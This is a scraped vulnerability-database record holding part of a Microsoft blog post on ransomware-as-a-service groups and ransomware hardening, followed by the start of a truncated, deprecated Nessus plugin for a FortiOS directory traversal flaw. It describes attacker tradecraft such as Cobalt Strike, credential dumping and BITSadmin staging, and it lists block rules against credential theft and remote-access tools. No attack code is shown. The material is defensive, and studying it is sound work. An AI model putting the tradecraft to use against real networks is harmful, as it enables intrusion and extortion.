lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mmpc", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:17:34", "description": "The plugin was deprecated due to checking hosts for FortiClient instead of FortiOS. Use fortios_FG-IR-18-384.nasl (plugin ID 125885) instead.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-14T00:00:00", "type": "nessus", "title": "Fortinet FortiOS (Mac OS X) 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "MACOSX_FORTIOS_FG-IR-18-384.NASL", "href": "https://www.tenable.com/plugins/nessus/125891", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/11/18. Deprecated by fortios_FG-IR-18-384.nasl\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125891);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2018-13379\");\n script_bugtraq_id(108693);\n script_xref(name:\"IAVA\", value:\"0001-A-0002-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Fortinet FortiOS (Mac OS X) 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384) (deprecated)\");\n script_summary(english:\"Checks the version of FortiOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"The plugin was deprecated due to checking hosts for FortiClient instead of FortiOS. Use fortios_FG-IR-18-384.nasl\n(plugin ID 125885) instead.\");\n # https://fortiguard.com/psirt/FG-IR-18-384\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8b8063\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Fortinet FortiGate SSL VPN File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 